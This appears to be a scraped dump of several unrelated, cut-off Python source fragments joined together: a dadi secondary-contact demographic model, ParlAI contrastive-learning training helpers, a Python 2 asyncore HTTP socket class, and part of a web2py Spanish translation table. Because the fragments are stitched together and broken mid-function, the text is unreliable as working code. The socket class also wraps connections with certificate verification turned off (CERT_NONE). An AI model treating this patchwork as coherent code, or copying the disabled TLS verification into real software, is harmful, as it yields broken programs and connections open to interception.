fslrM = dadi.Numerics.reverse_array(fslrO)
### Sum the spectra
fs = O*((1-Q)*fsnrO + Q*fslrO) + (1-O)*((1-Q)*fsnrM + Q*fslrM)
return fs
def SCG(params, (n1,n2), pts):
nu1, nu2, b1, b2, m12, m21, Ts, Tsc, O = params
"""
Model with split, complete isolation, followed by secondary contact with exponential growth
nu1: Size of population 1 at split.
nu2: Size of population 2 at split.
b1: Population growth coefficient of population 1
b2: Population growth coefficient of population 2
m12: Migration from pop 2 to pop 1 (2*Na*m12).
m21: Migration from pop 1 to | |
<gh_stars>10-100
import copy
import random
import math
import nltk
import numpy as np
import torch
from nltk.util import bigrams, trigrams
from parlai.agents.dialog_evaluator.auto_evaluator import CorpusSavedDictionaryAgent
from parlai.agents.dialog_wae.dialog_wae import make_floor
from parlai.core.message import Message
from parlai.core.metrics import AverageMetric
from parlai.core.opt import Opt
from parlai.core.torch_generator_agent import Batch
from parlai.utils.torch import padded_3d
RANDOM_SAMPLING = -1
NO_SAMPLING = -2
class SampleExtendBatch(Batch):
def __init__(self,
samp_cs_vecs=None,
samp_cs=None,
samp_rs_vecs=None,
samp_rs=None,
c_vs_samp_r_scores=None,
samp_c_vs_r_scores=None,
**kwargs):
super().__init__(
samp_cs_vecs=samp_cs_vecs,
samp_cs=samp_cs,
samp_rs_vecs=samp_rs_vecs,
samp_rs=samp_rs,
c_vs_samp_r_scores=c_vs_samp_r_scores,
samp_c_vs_r_scores=samp_c_vs_r_scores,
**kwargs
)
class SampleExtendDictionaryAgent(CorpusSavedDictionaryAgent):
def act(self):
"""
Add words in the last observation to the dictionary.
This checks any fields in the message present in the --dict-textfields
argument (e.g. "text,labels").
"""
for textfield in self.textfields:
source = self.observation.get(textfield)
if source is None:
continue
# fields may be singleton strings or lists of strings.
# wrap the singleton strings in a list to iterate over them
if type(source) is str:
source = [source]
for text in source:
if text:
items = text.split('__SAMP__')
text = items[0].strip()
tokens = self.tokenize(text)
self.add_to_dict(tokens)
unigram_ = nltk.ngrams(tokens, 1)
bigrams_ = bigrams(tokens)
trigrams_ = trigrams(tokens)
self.unigram_freq.update(unigram_)
self.bigram_freq.update(bigrams_)
self.trigram_freq.update(trigrams_)
return {'id': 'Dictionary'}
def cl_init(self, shared=None):
assert not self.opt['multigpu'], "CL training now does not support multigpu training!" \
"Set --multigpu False."
self.ref_update = False
self.cl_training_steps = 0
if shared:
self.ref_agent = shared['ref_agent']
self.eval_ref_agent = shared['eval_ref_agent']
if 'neg_samples' in shared:
self.neg_samples = shared['neg_samples']
else:
if self.opt['naive_neg_sampling']:
self.neg_samples = set()
cl_build_ref_agent(self)
# loading the saved ref_agent
init_model, _ = self._get_init_model(self.opt, shared)
if init_model is not None:
import parlai.utils.pickle
states = torch.load(
init_model, map_location=lambda cpu, _: cpu, pickle_module=parlai.utils.pickle
)
load_ref_agent(self, states)
if self.use_cuda:
self.ref_agent.model.cuda()
self.eval_ref_agent.model.cuda()
def cl_share(self, shared):
shared['ref_agent'] = self.ref_agent
shared['eval_ref_agent'] = self.eval_ref_agent
if self.opt['naive_neg_sampling']:
shared['neg_samples'] = self.neg_samples
return shared
def observe_samp_expanded_observation(observation, multi_turn=False):
"""
Process incoming message in preparation for producing a response.
This includes remembering the past history of the conversation.
"""
# TODO: Migration plan: TorchAgent currently supports being passed
# observations as vanilla dicts for legacy interop; eventually we
# want to remove this behavior and demand that teachers return Messages
observation = Message(observation)
if 'text' in observation:
# ---> refactor the observation
orig_text: str = observation['text']
items = orig_text.split('__SAMP__')
real_text = items[0].strip()
samp_cs, samp_rs, c_vs_samp_r_scores, samp_c_vs_r_scores = None, None, None, None
if len(items) > 1:
samples = [d.strip() for d in items[1].split('__EOD__')]
samp_cs = [d.split('__EOC__')[0].strip() for d in samples]
samp_rs = [d.split('__EOC__')[1].strip() for d in samples]
if multi_turn:
samp_cs = [[utt.strip() for utt in samp_c.split('__EOT__')] for samp_c in samp_cs]
if len(items) > 2:
c_vs_samp_r_scores = [float(score) for score in items[2].split()]
if len(items) > 3:
samp_c_vs_r_scores = [float(score) for score in items[3].split()]
observation.force_set('text', real_text)
observation['samp_cs'] = samp_cs
observation['samp_rs'] = samp_rs
observation['c_vs_samp_r_scores'] = c_vs_samp_r_scores
observation['samp_c_vs_r_scores'] = samp_c_vs_r_scores
# <--- refactor the observation
return observation
EMPTY = torch.zeros(0, dtype=torch.long)
def cl_batchify(self, batch):
if len(batch) == 0:
return batch
exs = batch.observations
# SAMP_CS
samp_cs, samp_cs_vecs = None, None
if any('samp_cs_vecs' in ex for ex in exs):
samp_cs = [ex.get('samp_cs', [""]) for ex in exs]
samp_cs_vecs = [ex.get('samp_cs_vecs', [EMPTY]) for ex in exs]
# SAMP_RS
samp_rs, samp_rs_vecs = None, None
if any('samp_rs_vecs' in ex for ex in exs):
samp_rs = [ex.get('samp_rs', None) for ex in exs]
samp_rs_vecs = [ex.get('samp_rs_vecs', None) for ex in exs]
# SCORES
c_vs_samp_r_scores, samp_c_vs_r_scores = None, None
if any(ex.get('c_vs_samp_r_scores') is not None for ex in exs):
# noinspection PyArgumentList
c_vs_samp_r_scores = torch.FloatTensor([ex.get('c_vs_samp_r_scores') for ex in exs])
if self.use_cuda:
c_vs_samp_r_scores = c_vs_samp_r_scores.cuda()
if any(ex.get('samp_c_vs_r_scores') is not None for ex in exs):
# noinspection PyArgumentList
samp_c_vs_r_scores = torch.FloatTensor([ex.get('samp_c_vs_r_scores') for ex in exs])
if self.use_cuda:
samp_c_vs_r_scores = samp_c_vs_r_scores.cuda()
extend_batch = SampleExtendBatch(**{k: v for k, v in batch.items()})
extend_batch.samp_cs_vecs = samp_cs_vecs
extend_batch.samp_cs = samp_cs
extend_batch.samp_rs_vecs = samp_rs_vecs
extend_batch.samp_rs = samp_rs
extend_batch.c_vs_samp_r_scores = c_vs_samp_r_scores
extend_batch.samp_c_vs_r_scores = samp_c_vs_r_scores
return extend_batch
def _set_samp_label_vec(self, obs, add_start, add_end, truncate):
if 'samp_rs' not in obs or obs['samp_rs'] is None:
return
elif 'samp_rs_vecs' in obs:
# check truncation of pre-computed vector
samp_rs_list_of_vec = []
for samp_r_vec in obs['samp_rs_vecs']:
truncated_vec = self._check_truncate(samp_r_vec, truncate)
# noinspection PyArgumentList
samp_rs_list_of_vec.append(torch.LongTensor(truncated_vec))
obs.force_set('samp_rs_vecs', samp_rs_list_of_vec)
else:
samp_rs_list_of_vec = []
for samp_r in obs['samp_rs']:
truncated_vec = self._vectorize_text(samp_r, add_start, add_end, truncate, False)
samp_rs_list_of_vec.append(truncated_vec)
obs['samp_rs_vecs'] = samp_rs_list_of_vec
return obs
def _set_samp_text_vec(self, obs, truncate):
if 'samp_cs' not in obs or obs['samp_cs'] is None:
return
if 'samp_cs_vecs' in obs:
if truncate is not None:
# check truncation of pre-computed vectors
vecs = obs['samp_cs_vecs']
for i, samp_c in enumerate(vecs):
vecs[i] = self._check_truncate(samp_c, truncate)
elif obs.get('samp_cs'):
obs['samp_cs_vecs'] = [
self._vectorize_text(samp_c, truncate=truncate)
for samp_c in obs['samp_cs']
]
return obs
def _set_samp_multi_turn_text_vec(self, obs, truncate):
if 'samp_cs' not in obs or obs['samp_cs'] is None:
return
if 'samp_cs_vecs' in obs:
if truncate is not None:
# check truncation of pre-computed vectors
vecs = obs['samp_cs_vecs']
for i, samp_c in enumerate(vecs):
vecs[i] = [self._check_truncate(c_utt, truncate) for c_utt in samp_c]
elif obs.get('samp_cs'):
obs['samp_cs_vecs'] = [
[self._vectorize_text(c_utt, truncate=truncate) for c_utt in samp_c]
for samp_c in obs['samp_cs']
]
return obs
def _log_p(self, scores, ys):
score_view = scores.view(-1, scores.size(-1))
loss = self.criterion(score_view, ys.reshape(-1))
loss = loss.view(scores.shape[:-1]).sum(dim=1) # bsz
return -loss
def _compute_sample_cl_loss(self, target_scores, target_ys, ref_scores, ref_ys, matching_scores):
log_p_m = _log_p(self, target_scores, target_ys)
log_p_n = _log_p(self, ref_scores, ref_ys)
"""
target_log_p = F.log_softmax(target_scores, -1).gather(-1, target_ys.unsqueeze(-1)).squeeze(-1) # bsz, seq_len
ref_log_p = F.log_softmax(ref_scores, -1).gather(-1, ref_ys.unsqueeze(-1)).squeeze(-1)
target_notnull = target_ys.ne(self.NULL_IDX)
ref_notnull = ref_ys.ne(self.ref_agent.NULL_IDX)
# target_tokens = target_notnull.float().sum()
target_log_p = target_log_p.masked_fill(~target_notnull, 0.)
ref_log_p = ref_log_p.masked_fill(~ref_notnull, 0.)
log_p_m = torch.sum(target_log_p, dim=-1)
log_p_n = torch.sum(ref_log_p, dim=-1)
"""
# matching_scores = matching_scores.unsqueeze(-1).expand(ys.size(0), ys.size(1)).reshape(-1)[notnull]
# log_p_m = target_log_p.view(-1)[notnull]
# log_p_n = ref_log_p.view(-1)[notnull]
g = torch.sub(log_p_m, log_p_n)
h = torch.sigmoid(g)
if self.opt.get('only_pos', False) and self.model.training:
matching_scores[matching_scores < 0] = 0.0
if self.opt.get('only_neg', False) and self.model.training:
matching_scores[matching_scores > 0] = 0.0
# noinspection PyTypeChecker
batch_cl_loss = -torch.log(torch.clamp(-matching_scores * (0.5 - h) + 0.5, 1e-20, 1e20))
if self.opt['cl_loss_per_token']:
target_notnull = target_ys.ne(self.NULL_IDX)
target_tokens = target_notnull.float().sum()
crt_cl_loss = torch.sum(
batch_cl_loss
) / target_tokens.sum() # average loss per token
else:
crt_cl_loss = torch.sum(
batch_cl_loss
) / target_ys.size(0) # average loss per sample
# batch_cl_loss = -matching_scores * (log_p_m - torch.log(torch.exp(log_p_m) + torch.exp(log_p_n)))
return crt_cl_loss, batch_cl_loss
def cl_build_ref_agent(self):
ref_model_file = self.opt['ref_model_file']
if ref_model_file is None or ref_model_file.lower() == "none":
raise RuntimeError("CL training requires reference model!")
else:
from parlai.core.agents import create_agent_from_opt_file
ref_agent = create_agent_from_opt_file(Opt({'model_file': ref_model_file}))
eval_ref_agent = create_agent_from_opt_file(Opt({'model_file': ref_model_file}))
if ref_agent is None:
raise RuntimeError("Build reference model failed! check your `ref_model_file`:{}!".format(ref_model_file))
if self.id == ref_agent.id and dict_same(self, ref_agent):
self.use_external_ref_model = False
else:
self.use_external_ref_model = True
# No need to do this
# # check dict
# if self.dict.tok2ind != ref_agent.dict.tok2ind or self.dict.ind2tok != ref_agent.dict.ind2tok:
# raise RuntimeError("Reference model is using different dict!")
self.eval_ref_agent = eval_ref_agent
self.ref_agent = ref_agent
def cl_state_dict(self, states):
if hasattr(self, 'ref_agent'):
states['ref_agent'] = self.ref_agent.model.state_dict()
if hasattr(self, 'eval_ref_agent'):
states['eval_ref_agent'] = self.eval_ref_agent.model.state_dict()
if hasattr(self, 'neg_samples'):
states['neg_samples'] = self.neg_samples
return states
def load_ref_agent(self, states):
if 'ref_agent' in states:
try:
self.ref_agent.model.load_state_dict(states['ref_agent'])
except RuntimeError:
raise
if 'eval_ref_agent' in states:
try:
self.eval_ref_agent.model.load_state_dict(states['eval_ref_agent'])
except RuntimeError:
raise
if 'neg_samples' in states:
self.neg_samples = states['neg_samples']
def _soft_normalize(scores, threshold=0.5):
return torch.clamp(2 * (scores + 0.5 - threshold) - 1, -1, 1)
def _hard_normalize(scores, neg_threshold, pos_threshold):
assert 0 < neg_threshold <= pos_threshold < 1
scores[scores >= pos_threshold] = 1.0
scores[scores < neg_threshold] = 0.0
return _soft_normalize(scores)
def _filter_normalize(scores, neg_threshold, pos_threshold):
assert 0 <= neg_threshold <= pos_threshold <= 1
mask_gt_neg = scores > neg_threshold
mask_lt_pos = scores < pos_threshold
scores[mask_gt_neg & mask_lt_pos] = 0.5
return _soft_normalize(scores)
def normalize_score(scores, self_opt):
# scores: ~(0, 1)
# return: ~(-1, 1)
# ret_scores = torch.tanh(-3.0 + 6.0 * scores) # ~(-1, 1)
assert (self_opt.get('soft_normalize_score', True) and self_opt.get('filter_normalize_score', False)) is not True, \
"Conflict options with both soft_normalize_score==True and filter_normalize_score==True!"
if self_opt.get('soft_normalize_score', True):
return _soft_normalize(scores, self_opt.get('cl_threshold', 0.5))
elif self_opt.get('filter_normalize_score', False):
return _filter_normalize(scores, self_opt.get('neg_threshold', 0.5), self_opt.get('pos_threshold', 0.5))
else:
return _hard_normalize(scores, self_opt.get('neg_threshold', 0.5), self_opt.get('pos_threshold', 0.5))
def __sample_batchify_pos(model_agent, batch, ref_agent_share_same_dict_with_target, multi_turn):
if ref_agent_share_same_dict_with_target:
return {}, {}
else:
if not ref_agent_share_same_dict_with_target and not multi_turn:
# ref_agent is another type of model, like GPT2, target_agent is seq2seq or transformer
texts = [obs['full_text'] for obs in batch.observations]
text_vec = [model_agent._vectorize_text(utt, truncate=model_agent.opt['text_truncate']) for utt in texts]
to_replace = __text_batchify(model_agent, text_vec)
else:
multi_turn_text = [[utt.strip() for utt in obs['full_text'].split(model_agent.history.delimiter)]
for obs in batch.observations]
multi_turn_text_vec = [
[model_agent._vectorize_text(
c_utt,
truncate=model_agent.opt['text_truncate']
) for c_utt in samp_c] for samp_c in multi_turn_text
]
to_replace = __text_batchify_multi_turn(model_agent, multi_turn_text_vec)
label_vec = [
model_agent._vectorize_text(
| |
'POST':
dicts = (self.default_headers, self.default_post_headers)
else:
dicts = (self.default_headers,)
for _dict in dicts:
for k in _dict:
if k not in req.headers:
req.headers[k] = _dict[k]
class AsyncHttpSocket(AsyncSocket, Events.EventMixin):
_http_vsn_str = AsyncHttpConnection._http_vsn_str
CRLF = '\r\n'
events = Events.EventMixin.events | set((
"on_connect", # args = socket
"on_connection_error", # args = socket, error
"on_close", # args = socket
"on_http_error", # args = socket, error
"on_request", # args = socket, request (Request object)
"on_request_error", # args = socket, request (Request object), error
"on_status_line", # args = socket, (httpver, code, reason)
"on_headers", # args = socket, headers (list of tuples)
"on_body", # args = socket, request (Request object), (httpver, code, reason), headers (list of tuples), body (file-like object)
))
def __init__(self, conn = None):
self._connected = False
Events.EventMixin.__init__(self)
AsyncSocket.__init__(self, conn)
self.buffer = []
self.status_line = ''
self.status = None
self.chunk_header = ''
self.current_request = None
self.current_body = stringio()
self.current_chunk = stringio()
self.current_headers = ''
self.body_length = 0
self.waiting_for = 'request'
self.set_terminator(self.CRLF)
self.ssl = False
self.ssl_want = None
self.lastbuffer = None
self._sent_data = False
def _repr(self):
return 'connected=%r' % self._connected
def close(self):
log.info('%r closing, has sent data? %r. waiting_for = %r, terminator = %r', self, self._sent_data, self.waiting_for, self.terminator)
if self.status is not None:
log.info('\tstatus = %r', self.status)
AsyncSocket.close(self)
def setup_ssl(self, ssl_cb=None):
'''
Note: this method is blocking. However, the connection is already
established and we're on the net thread. Shouldn't be too bad if we
block it for the duration of the SSL handshake.
'''
log.debug('setting up ssl on socket (waiting_for=%r): %r', self.waiting_for, self)
self.ssl = True
self.socket = ssl.wrap_socket(self.socket,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.socket.setblocking(0)
self.ssl_want = 'write'
self.ssl_cb = ssl_cb
log.debug('wrap_socket completed')
def _call_do_handshake(self):
s = self.socket
try:
log.debug('calling do_handshake()')
log.debug('sock.gettimeout() is %r', s.gettimeout())
s.do_handshake()
except ssl.SSLError, err:
if err.args[0] == ssl.SSL_ERROR_WANT_READ:
log.debug('SSL_ERROR_WANT_READ')
self.ssl_want = 'read'
elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
log.debug('SSL_ERROR_WANT_WRITE')
self.ssl_want = 'write'
else:
raise
else:
log.debug('handshake finished.')
self.ssl_want = None
ssl_cb, self.ssl_cb = self.ssl_cb, None
if ssl_cb is not None:
ssl_cb()
def handle_read(self):
if self.ssl_want is not None:
self._call_do_handshake()
else:
return super(AsyncHttpSocket, self).handle_read()
def handle_write(self):
if self.ssl_want is not None:
self._call_do_handshake()
else:
return super(AsyncHttpSocket, self).handle_write()
def readable(self):
return self.ssl_want != 'write' and (self.ssl_want == 'read' or AsyncSocket.readable(self))
def writable(self):
return self.ssl_want != 'read' and (self.ssl_want == 'write' or AsyncSocket.writable(self))
def recv(self, buffer_size=4096):
self.ssl_want = None
try:
return super(AsyncHttpSocket, self).recv(buffer_size)
except ssl.SSLError, e:
if e.args[0] == ssl.SSL_ERROR_WANT_WRITE:
log.warning("read_want_write")
self.ssl_want = 'write'
return ""
elif e.args[0] == ssl.SSL_ERROR_WANT_READ:
log.warning("read_want_read")
self.ssl_want = 'read'
return ""
else:
raise socket.error(e)
def send(self, buf):
self.ssl_want = None
if not self.ssl:
return super(AsyncHttpSocket, self).send(buf)
r = None
if not self.lastbuffer:
try:
r = self.socket.send(buf)
except ssl.SSLError, e:
if e.args[0] == ssl.SSL_ERROR_WANT_WRITE:
log.warning("write_want_write")
self.ssl_want = 'write'
self.lastbuffer = buf # -1: store the bytes for later
return len(buf) # consume from asyncore
elif e.args[0] == ssl.SSL_ERROR_WANT_READ:
log.warning("write_want_read")
self.ssl_want = 'read'
return 0
else:
raise socket.error(e, r)
else:
if r < 0:
raise socket.error('unknown -1 for ssl send', r)
return r
else:
try:
# we've got saved bytes--send them first.
r = self.socket.send(self.lastbuffer)
except ssl.SSLError, e:
if e.args[0] == ssl.SSL_ERROR_WANT_WRITE:
log.warning("write_want_write (buffer)")
self.ssl_want = 'write'
elif e.args[0] == ssl.SSL_ERROR_WANT_READ:
log.warning("write_want_read (buffer)")
self.ssl_want = 'read'
else:
raise socket.error(e, r)
else:
if r < 0:
raise socket.error('unknown -1 for ssl send (buffer)', r)
elif r < len(self.lastbuffer):
self.lastbuffer = self.lastbuffer[r:]
else:
self.lastbuffer = ''
return 0
def initiate_send(self):
#if there's nothing else in the socket buffer, the super class initiate_send won't call send
# and self.lastbuffer won't be flushed.
if self.lastbuffer:
assert self.ssl_want == 'write'
self.send(None)
return
return super(AsyncHttpSocket, self).initiate_send()
def request(self, request):
if not self.waiting_for == 'request':
raise Exception('Socket not ready for a request', self, self.waiting_for)
else:
self.current_request = request
self._send_request()
def _send_request(self):
self.waiting_for = 'status'
self.set_terminator(self.CRLF)
r = self.current_request
self._push_start_line(r)
self._push_headers(r)
self._push_body(r)
def _format_headers(self, req):
buf = stringio()
write = buf.write
header_dicts = [req.headers, req.unredirected_hdrs]
for d in header_dicts:
for key, value in d.items():
write(key); write(': ')
write(value); write('\r\n')
write('\r\n')
return buf.getvalue()
def _push_start_line(self, req):
if self._is_proxy:
selector = req.get_full_url()
else:
selector = req.get_selector()
if not selector:
selector = '/'
start_line = '%s %s %s\r\n' % (req.get_method(), selector.encode('ascii'), self._http_vsn_str)
self.push(start_line)
self._sent_data = True
#_log.debug('pushed start line: %r', start_line)
def _push_headers(self, req):
data = self._format_headers(req)
self.push(data)
#_log.debug('pushed headers: %r', data)
def _push_body(self, req):
if req.has_data():
data = req.get_data()
else:
data = ''
# As soon as the producer's .more returns '', the callback will go off, signalling that the request has been sent.
# With no data, this happens immediately. With data, it happens at the end.
prod = producer_cb(data, success = lambda: self.on_request(), error = lambda e: self.on_request_error(e))
self.push_with_producer(prod)
#_log.debug('pushed body: %r', data)
# ------ AsyncSocket methods
def handle_connect(self):
if not self._connected:
self._connected = True
self.on_connect()
def handle_close(self):
log.debug('handle_close for %r', self)
self._connected = False
self.close()
if self.get_terminator() in (None, 0) and self.waiting_for == 'body':
self.on_body()
if self._sent_data:
self.on_close()
else:
self.on_connection_error('socket closed before data sent')
def handle_error(self, e=None):
log.debug('handle_error for %r', self)
if e is None:
e = sys.exc_info()[1]
if isinstance(e, socket.error):
errno, _errmsg = e.args
if errno in _ok_errors:
return
log.info('Socket error: %r', e)
if sys.exc_info() != (None, None, None):
traceback.print_exc()
self._connected = False
self.close()
self.on_connection_error(e)
def handle_expt(self):
log.debug('handle_expt for %r', self)
self.handle_error(OOB_Exception("OOB data"))
def collect_incoming_data(self, data):
if self.waiting_for == 'status':
self.status_line += data
elif self.waiting_for == 'headers':
self.buffer.append(data)
elif self.waiting_for == 'body':
if self.buffer:
old_data = ''.join(self.buffer)
self.collect_body_data(old_data)
self.set_terminator(self.terminator - len(old_data))
del self.buffer[:]
if self.terminator == 0: # Unlikely, but just in case
self.found_terminator()
self.collect_body_data(data)
elif self.waiting_for == 'chunk-header':
self.collect_chunk_header(data)
elif self.waiting_for == 'chunk-body':
self.collect_chunk_data(data)
elif self.waiting_for == 'request':
log.error("Received data when no response was expected. This is an error and the socket will close. The data was: %r", data)
self.handle_error(Exception("Unexpected data received: %r" % data))
else:
raise AssertionError("Shouldn't be waiting for this: %r" % self.waiting_for)
def found_terminator(self):
#_log.debug('Found terminator %r. Currently waiting for: %r', self.terminator, self.waiting_for)
if self.waiting_for == 'status':
status_line = self.status_line
if status_line == '':
new_term = self.CRLF
else:
new_term = self.on_status_line()
self.set_terminator(new_term)
elif self.waiting_for == 'headers':
data = ''.join(self.buffer)
del self.buffer[:]
self.on_headers(data) # Changes 'waiting_for' to 'body' or 'request' or 'chunk-header' and sets new terminator
elif self.waiting_for == 'body':
if self.body_length:
self.on_body() # Changes 'waiting_for' to 'request'
else:
log.warning('Received chunk for body of unknown size.')
self.set_terminator(512)
elif self.waiting_for == 'chunk-header':
new_term = self.process_chunk_header()
self.set_terminator(new_term)
elif self.waiting_for == 'chunk-body':
new_term = self.process_chunk_data()
self.set_terminator(new_term)
else:
raise AssertionError("Unexpected 'waiting_for' for found_terminator: %r. Current buffer is: %r", self.waiting_for, self.buffer)
# ------- End AsyncSocket methods
# ------- Helper methods
def collect_body_data(self, data):
self.current_body.write(data)
def collect_chunk_header(self, data):
self.chunk_header += data
def collect_chunk_data(self, data):
self.current_chunk.write(data)
def process_chunk_header(self):
hdr, self.chunk_header = self.chunk_header, ''
if hdr == '':
# This happens every odd time this function is called. protocol states that
# the header /includes/ a newline even though the next thing to read is a
return self.CRLF
#log.debug('Got chunk header: %r', hdr)
hdr_parts = hdr.split(';', 1)
sz, _rest = hdr_parts[0], hdr_parts[1:]
chunk_size = int(sz, 16)
self.waiting_for = 'chunk-body'
if chunk_size == 0:
return self.CRLF
else:
return chunk_size
def process_chunk_data(self):
chunk = self.current_chunk.getvalue()
self.current_chunk = stringio()
if len(chunk) == 0:
self.waiting_for = 'request'
self.on_body()
return self.CRLF
else:
header = self.chunk_header
self.chunk_header = ''
self.waiting_for = 'chunk-header'
return self.decode_chunk(header, chunk)
# TODO: return new terminator ("\r\n" ?)
@property
def original_request(self):
return getattr(self.current_request, '_orig_request', self.current_request)
def decode_chunk(self, header, chunk):
if chunk[:2] == '\r\n':
chunk = chunk[2:]
req = self.original_request
req.on_chunk(chunk)
if req.accumulate_body:
self.current_body.write(chunk)
return self.CRLF
# --------- End helpers
# --------- Events
@Events.event
def on_connect(self):
'''
on_connect: this event is thrown when this socket connects.
the socket is the only event argument.
'''
#self._connected_host, self._connected_port = self.getpeername()
return self
@Events.event
def on_close(self):
'''
on_close: this event is thrown when this socket is closed normally.
the socket is the only event argument.
'''
return self
@Events.event
def on_connection_error(self, e):
'''
on_connection_error: this event is thrown when a connection related (but non-HTTP) error occurs.
the event arguments are this socket and the | |
'Diseño por',
'detecting': 'detectando',
'Device': 'Dispositivo',
'device already unlocked': 'device already unlocked',
'device must be unlocked by another one': 'device must be unlocked by another one',
'device not found': 'dispositivo no encontrado',
'Devices': 'Dispositivos',
'Di Impresionnumero': 'Impresión Nº',
'Di Numeroventas': 'Ac.Num.Ventas',
'Di Valorventas': 'Ac. Ventas',
'Direct links': 'Enlaces directos',
'DISK': 'DISCO',
'Disk Cache Keys': 'Llaves de Caché en Disco',
'Disk Cleared': 'Disco limpiado',
'Dispositivo': 'Dispositivo',
'Documentation': 'Documentación',
"Don't know what to do?": '¿No sabe que hacer?',
'done!': '¡hecho!',
'done: %s %s': 'Correcto: %s %s',
'Download': 'Descargas',
'dónde se utiliza': 'dónde se utiliza',
'E-mail': 'Correo electrónico',
'edit': 'editar',
'EDIT': 'EDITAR',
'Edit': 'Editar',
'Edit %(entity)s': 'Editar %(entity)s',
'Edit application': 'Editar aplicación',
'edit controller': 'editar controlador',
'Edit current record': 'Edite el registro actual',
'Edit Profile': 'Editar Perfil',
'edit profile': 'editar perfil',
'Edit This App': 'Edite esta App',
'Editing file': 'Editando archivo',
'Editing file "%s"': 'Editando archivo "%s"',
'Eliminar': 'Eliminar',
'Email': 'Email',
'Email and SMS': 'Correo electrónico y SMS',
'Email sent': 'Correo electrónico enviado',
'Email verification': 'Verificación de email',
'Email verified': 'Email verificado',
'End of impersonation': 'Fin de suplantación',
'Enter a number': 'Introduzca un número',
'enter a number between %(min)g and %(max)g': 'introduzca un número entre %(min)g y %(max)g',
'Enter a number between %(min)g and %(max)g': 'Introduzca un numero entre %(min)g y %(max)g',
'Enter a valid email address': 'Introducir una dirección de correo válida',
'enter a value': 'introduzca un valor',
'Enter a value': 'Introducir un valor',
'Enter an integer between %(min)g and %(max)g': 'Introduzca un entero entre %(min)g y %(max)g',
'enter an integer between %(min)g and %(max)g': 'introduzca un entero entre %(min)g y %(max)g',
'Enter an integer greater than or equal to %(min)g': 'Enter an integer greater than or equal to %(min)g',
'enter date and time as %(format)s': 'introduzca fecha y hora como %(format)s',
'Enter date and time as %(format)s': 'Enter date and time as %(format)s',
'Enter date as %(format)s': 'Introduzca fecha como %(format)s',
'Enter from %(min)g to %(max)g characters': 'Enter from %(min)g to %(max)g characters',
'Entity type': 'Tipo Entidad',
'Error': 'Error',
'Error logs for "%(app)s"': 'Bitácora de errores en "%(app)s"',
'Error: %s. Se canceló toda la copia': 'Error: %s. Se canceló toda la copia',
'errors': 'errores',
'Errors': 'Errores',
'Errors in form, please check it out.': 'Hay errores en el formulario, por favor comprúebelo.',
'Existe referencia al atributo actual ': 'Existe referencia al atributo actual ',
'export as csv file': 'exportar como archivo CSV',
'Export:': 'Exportar:',
'exposes': 'expone',
'extends': 'extiende',
'failed to reload module': 'la recarga del módulo ha fallado',
'FAQ': 'FAQ',
'Fecha': 'Fecha',
'Fechamonedero': 'Fecha Monedero',
'file "%(filename)s" created': 'archivo "%(filename)s" creado',
'file "%(filename)s" deleted': 'archivo "%(filename)s" eliminado',
'file "%(filename)s" uploaded': 'archivo "%(filename)s" subido',
'file "%(filename)s" was not deleted': 'archivo "%(filename)s" no fué eliminado',
'file "%s" of %s restored': 'archivo "%s" de %s restaurado',
'file changed on disk': 'archivo modificado en el disco',
'file does not exist': 'archivo no existe',
'file saved on %(time)s': 'archivo guardado %(time)s',
'file saved on %s': 'archivo guardado %s',
'Fill form, please': 'Relleno el formulario, por favor',
'Filtro Descripcion': 'Filtro Descripcion',
'First name': 'Nombre',
'Forgot username?': '¿Olvidó el nombre de usuario?',
'Form consecutive submissions not allowed. Try re-submitting or refreshing the form page.': 'Form consecutive submissions not allowed. Try re-submitting or refreshing the form page.',
'Form has errors': 'Formulario con errores',
'form has errors': 'Formulario contiene errores',
'Forms and Validators': 'Formularios y validadores',
'Formula': 'Formula',
'Formula incorrecta: ': 'Formula incorrecta: ',
'Formula Tar': 'Formula Tar',
'Formula Trg': 'Formula Trg',
'Free Applications': 'Aplicaciones Libres',
'Free register': 'Registro gratuito',
'From accepted': 'Formulario aceptado',
'From tubes': 'Desde tubos',
'Full': 'Completo',
'Functions with no doctests will result in [passed] tests.': 'Funciones sin doctests equivalen a pruebas [aceptadas].',
'Fórm.Destino': 'Fórm.Destino',
'Fórm.Origen': 'Fórm.Origen',
'Fórmula': 'Fórmula',
'Fórmula contiene referencia al atributo actual ': 'Fórmula contiene referencia al atributo actual ',
'Fórmula incorrecta: ': 'Fórmula incorrecta: ',
'Fórmula predet.': 'Fórmula predet.',
'Get a Bluetooth o USB Serial adapter to communicate with the machines': 'Adquiera un adaptador Bluetooth o USB Serie para comunicar con las máquinas',
'Gpslat': 'GPS Latitud',
'Gpslon': 'GPS Longitud',
'Group %(group_id)s created': 'Grupo %(group_id)s creado',
'Group by machine': 'Agrupar por máquina',
'Group ID': 'ID de Grupo',
'Group uniquely assigned to user %(id)s': 'Grupo asignado únicamente al usuario %(id)s',
'Groups': 'Grupos',
'Grupo': 'Grupo',
'Grupos': 'Grupos',
'Hello Man': 'Hola, tío',
'Hello World': 'Hola Mundo',
'Help': 'Help',
'help': 'ayuda',
'Helping web2py': 'Helping web2py',
'Heredable': 'Heredable',
'Heredado': 'Heredado',
'Home': 'Inicio',
'How did you get here?': '¿Cómo llegaste aquí?',
'HTML': 'HTML',
'html': 'html',
'HTML export of visible columns': 'Exportar a HTML las columnas visibles',
'Id': 'Id',
'Id Idioma': 'Id Idioma',
'Id Pieza': 'Id Pieza',
'Idembalaje': 'Idembalaje',
'Idembalajeprincipal': 'Idembalajeprincipal',
'Idioma': 'Idioma',
'Idiomas': 'Idiomas',
'IMEI Phone not matches with registered device': 'IMEI Phone not matches with registered device',
'Impersonate': 'Suplantar',
'import': 'importar',
'Import/Export': 'Importar/Exportar',
'in': 'en',
'in process': 'en proceso',
'In tubes': ' En tubos',
'includes': 'incluye',
'Index': 'Índice',
'insert new': 'inserte nuevo',
'insert new %s': 'inserte nuevo %s',
'Install date in new client': 'Fecha instalación en nuevo cliente',
'Install/Uninstall Machine': 'Instalar/Desinstalar Máquina',
'Installation date': 'Fecha de instalación',
'Installations': 'Instalaciones',
'Installations history': 'Historico de instalaciones',
'Installed applications': 'Aplicaciones instaladas',
'Insufficient privileges': 'Privilegios insuficientes',
'internal error': 'error interno',
'Internal State': 'Estado Interno',
'Introduction': 'Introducción',
'Invalid action': 'Acción inválida',
'Invalid email': 'Correo electrónico inválido',
'invalid expression': 'expresión inválida',
'Invalid expression': 'Invalid expression',
'Invalid login': 'Inicio de sesión inválido',
'invalid password': '<PASSWORD>',
'Invalid Query': 'Consulta inválida',
'Invalid query': 'Consulta incorrecta',
